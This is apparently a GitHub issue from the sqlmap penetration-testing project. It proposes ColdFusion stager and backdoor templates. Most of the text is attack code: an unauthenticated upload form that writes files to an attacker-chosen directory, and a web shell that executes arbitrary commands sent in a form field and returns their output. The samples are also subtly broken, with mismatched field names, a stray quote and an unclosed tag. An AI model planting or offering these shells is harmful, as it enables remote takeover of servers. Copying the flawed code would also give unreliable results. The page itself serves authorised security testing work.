sqlmap icon indicating copy to clipboard operation
sqlmap copied to clipboard

Published 20 hours ago verified publisher icon sqlmapproject

CFM stager/backdoor

Open stamparm opened this issue 12 years ago • 1 comments

Stager sample [1]:

    <cfif isDefined("form.fileUpload")>
      <cffile action="upload"
         fileField="fileUpload"
         destination=form.uploadDir
         nameconflict="overwrite">
         <p>File uploaded</p>
    </cfif>
<form method=POST enctype=multipart/form-data><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=WRITABLE_DIR> <input type=submit name=upload value=upload></form>

Backdoor sample [2][3]:

    <cfif isdefined("form.cmd")>
    <cfset name=listFirst(form.cmd, " ")>
    <cfset arguments=listRest(form.cmd, " ")>
    <cfsavecontent variable="output">
    <cfexecute name=name arguments=arguments">
    </cfexecute>
    </cfsavecontent>
    <pre>
    <cfoutput>
    #output#
    </cfoutput>
    </pre>

[1] http://www.quackit.com/coldfusion/tutorial/coldfusion_upload_file.cfm [2] http://open-labs.org/hacker_webkit02.tar.gz [3] http://seclists.org/fulldisclosure/2005/May/200

stamparm avatar Jul 23 '12 08:07 stamparm

Another reference: https://github.com/danielmiessler/SecLists/blob/master/Web-Shells/laudanum-0.8/cfm/shell.cfm

stamparm avatar Feb 21 '19 00:02 stamparm